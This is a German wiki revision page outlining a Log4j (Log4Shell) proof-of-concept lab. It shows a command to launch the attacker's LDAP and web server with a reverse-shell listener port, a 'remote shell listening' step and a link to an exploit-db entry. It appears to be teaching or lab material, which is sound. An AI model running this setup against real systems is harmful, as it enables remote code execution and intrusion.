Log4j: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 9: Zeile 9:
 
*python3 poc.py --userip brian.x-men.de  --webport 8000 --lport 4545
 
*python3 poc.py --userip brian.x-men.de  --webport 8000 --lport 4545
 
[[Datei:Log4j-1.png]]
 
[[Datei:Log4j-1.png]]
 +
=Remoteshell listining=
 
[[Datei:Log4j-2.png]]
 
[[Datei:Log4j-2.png]]
  
 
=Exploit=
 
=Exploit=
 
*https://www.exploit-db.com/exploits/50592
 
*https://www.exploit-db.com/exploits/50592

Version vom 17. Dezember 2021, 10:56 Uhr

Schaubild

Proof of Concept

Download und entpacken

  • jdk-8u20-linux-x64.tar.gz

Starten des LDAP und Webservers

  • python3 poc.py --userip brian.x-men.de --webport 8000 --lport 4545

Log4j-1.png

Remoteshell listining

Log4j-2.png

Exploit